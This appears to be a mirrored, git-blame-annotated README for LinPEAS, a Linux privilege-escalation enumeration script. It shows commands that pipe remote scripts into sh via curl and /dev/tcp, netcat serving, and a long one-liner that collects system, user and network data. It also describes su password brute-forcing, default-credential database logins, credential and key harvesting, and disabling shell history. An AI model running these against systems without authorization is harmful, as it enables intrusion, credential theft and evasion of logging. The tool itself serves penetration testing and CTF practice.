1
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-12-01 03:00:39 +01:00
PEASS-ng/linPEAS/README.md

274 lines
19 KiB
Markdown
Raw Normal View History

2019-11-04 11:04:56 +01:00
# LinPEAS - Linux Privilege Escalation Awesome Script
2019-11-05 13:33:48 +01:00
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
2019-11-04 01:38:24 +01:00
**LinPEAS is a script that searh for possible paths to escalate privileges on Linux/Unix\* hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-unix/privilege-escalation)**
2019-11-04 01:45:16 +01:00
Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist)**.
2019-11-04 01:38:24 +01:00
2019-11-04 21:51:38 +01:00
[![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/279208)
2019-11-04 01:38:24 +01:00
## Quick Start
```bash
#From github
2019-11-05 13:33:48 +01:00
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
2019-11-04 01:38:24 +01:00
```
```bash
#Local network
python -m SimpleHTTPServer 80
curl 10.10.10.10/linpeas.sh | sh
#Without curl
2019-11-18 01:23:23 +01:00
nc -q 5 -lvnp 80 < linpeas.sh
2019-11-04 01:38:24 +01:00
cat < /dev/tcp/10.10.10.10/80 | sh
```
2019-12-08 00:28:35 +01:00
## IMPORTANT CHANGE
2019-12-08 00:29:51 +01:00
**For satisfying most users and thanks to the incorporation of the 2000pwds/user su bruteforce, the default behaviour of linpeas has been changed to fast/stealth (no writting to disk, no 1min processes check, and no su BF).**
**Use the parameter `-a` to execute all these checks.**
2019-12-08 00:28:35 +01:00
2019-11-04 01:38:24 +01:00
## Basic Information
The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD and OpenBSD).
This script doesn't have any dependency.
It uses **/bin/sh** sintax, so can run in anything supporting `sh` (and the binaries and parameters used).
2019-12-08 00:39:36 +01:00
By default, **linpeas won't write anything to disk and won't try to login as any other user using `su`**.
2019-12-08 00:28:35 +01:00
2019-12-08 00:39:36 +01:00
By default linpeas takes around **1 min** to complete, but It could take from **3 to 4 minutes** to execute all the checks using **-a** parameter *(Recommended option for CTFs)*:
- Less than 1 min to make almost all the checks
- Almost 1 min to search for possible passwords inside all the accesible files of the system
- 20s/user bruteforce with top2000 passwords *(need `-a`)* - Notice that this check is **super noisy**
- 1 min to monitor the processes in order to find very frequent cron jobs *(need `-a`)* - Notice that this check will need to **write** some info inside a file that will be deleted
2019-11-04 01:38:24 +01:00
2019-12-08 00:39:36 +01:00
**Other parameters:**
2019-12-08 00:28:35 +01:00
- **-a** (all checks) - This will **execute also the check of processes during 1 min, and brute-force each user using `su` with the top2000 passwords.**
- **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk)
2019-11-04 01:38:24 +01:00
This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector.
2019-12-08 00:39:36 +01:00
LinPEAS also **exports a new PATH** variable if common folders aren't present in the original PATH variable. It also **exports and unset** some environmental variables so no command executed during the session will be saved in the history file (you can avoid this actions using the parameter **-n**).
2019-11-04 01:38:24 +01:00
2019-11-05 13:33:48 +01:00
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/help.png)
2019-11-04 01:38:24 +01:00
## Hosts Discovery and Port Scanning
With LinPEAS you can also **discover hosts automatically** using `fping`, `ping` and/or `nc`, and **scan ports** using `nc`.
LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.
2019-11-05 13:33:48 +01:00
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
2019-11-04 01:38:24 +01:00
2019-12-02 18:51:26 +01:00
2019-11-04 01:38:24 +01:00
## Colors
<details>
<summary>Details</summary>
LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**.
The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to PE:
- Possible exploitable kernel versions
- Vulnerable sudo versions
- Identify processes running as root
- Not mounted devices
- Dangerous fstab permissions
- Writable files in interesting directories
- SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
- SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
- Check /etc/doas.conf
- 127.0.0.1 in netstat
- Known files that could contain passwords
- Capabilities in interesting binaries
- Interesting capabilities of a binary
- Writable folders and wilcards inside info about cron jobs
- Writables folders in PATH
- Groups that could lead to root
- Files that could contains passwords
2019-12-08 00:39:36 +01:00
- Suspicious cronjobs
2019-11-04 01:38:24 +01:00
The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for:
- Common processes run by root
- Common not interesting devices to mount
- Not dangerous fstab permissions
- SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
- Common .sh files in path
- Common names of users executing processes
2019-12-08 00:39:36 +01:00
- Common cronjobs
2019-11-04 01:38:24 +01:00
The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for:
- Users without shell
- Mounted devices
The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for:
- Users with shell
The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for:
- Current username
</details>
## One liner
Here you have an old linpe version script in one line, **just copy and paste it**;)
**The color filtering is not available in the one-liner** (the lists are too big)
This one-liner is deprecated (I am not going to update it more), but it could be useful in some cases so it will remain here:
The default file where all the data is recorded is: */tmp/linPE* (you can change it at the beginning of the script)
```sh
file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC
```
## What does linpeas look for
<details>
<summary>Details</summary>
- **System Information**
- [x] SO & kernel version
- [x] Sudo version
- [x] PATH
- [x] Date
- [x] System stats
- [x] Environment vars
- [x] SElinux
- [x] Printers
- [x] Dmesg (signature verifications)
- [x] Container?
- **Devices**
- [x] sd* in /dev
- [x] Unmounted filesystems
- **Available Software**
- [x] Useful software
- [x] Installed compilers
- **Processes & Cron & Services**
- [x] Cleaned processes
- [x] Binary processes permissions
- [x] Different processes executed during 1 min
- [x] Cron jobs
- [x] Services
- **Network Information**
- [x] Hostname, hosts & dns
- [x] Content of /etc/inetd.conf
- [x] Networks and neighbours
- [x] Iptables rules
- [x] Active ports
- [x] Sniff permissions (tcpdump)
- **Users Information**
- [x] Info about current user
- [x] PGP keys
- [x] `sudo -l` without password
- [x] doas config file
- [x] Pkexec policy
2019-12-02 19:33:07 +01:00
- [x] Try to login using `su` as other users (using as passwords: null pass, username, reverse username, and top2000pwds)
2019-11-04 01:38:24 +01:00
- [x] List of superusers
- [x] List of users with console
- [x] Login info
- [x] List of all users
- [x] Clipboard and highlighted text
2019-12-10 23:40:09 +01:00
- [x] Password policy
2019-11-04 01:38:24 +01:00
- **Software Information**
2019-12-12 21:05:31 +01:00
- [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured, credentials in config)
- [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:", file DBs, Config)
2019-11-04 01:38:24 +01:00
- [x] Apache (Version)
- [x] PHP cookies
- [x] Wordpress (Database credentials)
- [x] Tomcat (Credentials)
2019-12-12 21:05:31 +01:00
- [x] Mongo (Version, Credentials)
2019-11-04 01:38:24 +01:00
- [x] Supervisor (Credentials)
- [x] Cesi (Credentials)
- [x] Rsyncd (Credentials)
- [x] Hostapd (Credentials)
- [x] Wifi (Credentials)
- [x] Anaconda-ks (Credentials)
- [x] VNC (Credentials)
- [x] LDAP database (Credentials)
- [x] Open VPN files (Credentials)
- [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates, agents)
- [X] PAM-SSH (Unexpected "auth" values)
- [x] Cloud Credentials (credenals-AWS-, credentials.gb-GC-, legacy_credentials-GC-, access_tokens.db-GC-, accessTokens.json-Azure-, azureProfile.json-Azure-)
- [x] NFS (privilege escalation misconfiguration)
- [x] Kerberos (configuration & tickets in /tmp)
- [x] Kibana (credentials)
- [x] Logstash (Username and possible code execution)
- [x] Elasticseach (Config info and Version via port 9200)
- [x] Vault-ssh (Config values, secrets list and .vault-token files)
- [x] screen and tmux sessions
2019-12-12 21:05:31 +01:00
- [x] Couchdb
- [x] Redis
- [x] Dovecot
2019-11-04 01:38:24 +01:00
- **Generic Interesting Files**
- [x] SUID & SGID files
- [x] Capabilities
- [x] .sh scripts in PATH
2019-12-11 18:41:08 +01:00
- [x] scripts in /etc/profile.d
2019-11-04 01:38:24 +01:00
- [x] Hashes (passwd, shadow & master.passwd)
- [x] Try to read root dir
- [x] Files owned by root inside /home
- [x] List of readable files belonging to root and not world readable
- [x] Root files inside a folder owned by the current user
- [x] Reduced list of files inside my home and /home
2019-12-12 21:05:31 +01:00
- [x] Mail applications
2019-11-04 01:38:24 +01:00
- [x] Mails
- [x] Backup files
- [x] DB files
- [x] Web files
- [x] Files that can contain passwords (and search for passwords inside *_history files)
- [x] List of all hidden files
- [x] List ALL writable files for current user (global, user and groups)
- [x] Inside /tmp, /var/tmp and /var/backups
- [x] Password ins config PHP files
- [x] Get IPs, passwords and emails from logs
- [x] password or credential files in home
- [x] "pwd" and "passw" inside files (and get most probable lines)
</details>
## Do not fork it!!
2019-11-05 13:33:48 +01:00
If you want to **add something** and have **any cool idea** related to this project, please let me know it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** and we will update the master version.
2019-11-04 01:38:24 +01:00
2019-11-04 14:46:33 +01:00
## Please, if this tool has been useful for you consider to donate
[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DED2HWDYLFT2C&source=url)
2019-11-04 17:22:22 +01:00
## Looking for a useful Privilege Escalation Course?
Contact me and ask about the **Privilege Escalation Course** I am preparing for attackers and defenders (**100% technical**).
2019-11-04 01:38:24 +01:00
## TODO
- Add more checks
- Mantain updated the list of vulnerable SUID binaries
- Mantain updated all the blacklists used to color the output
- Support for MacOS
2019-11-05 13:33:48 +01:00
If you want to help with any of this, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
2019-11-04 01:38:24 +01:00
2019-11-05 13:33:48 +01:00
If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**.
2019-11-04 01:38:24 +01:00
**Linpeas** is being **updated** every time I find something that could be useful to escalate privileges.
## License
MIT License
By Polop<sup>(TM)</sup>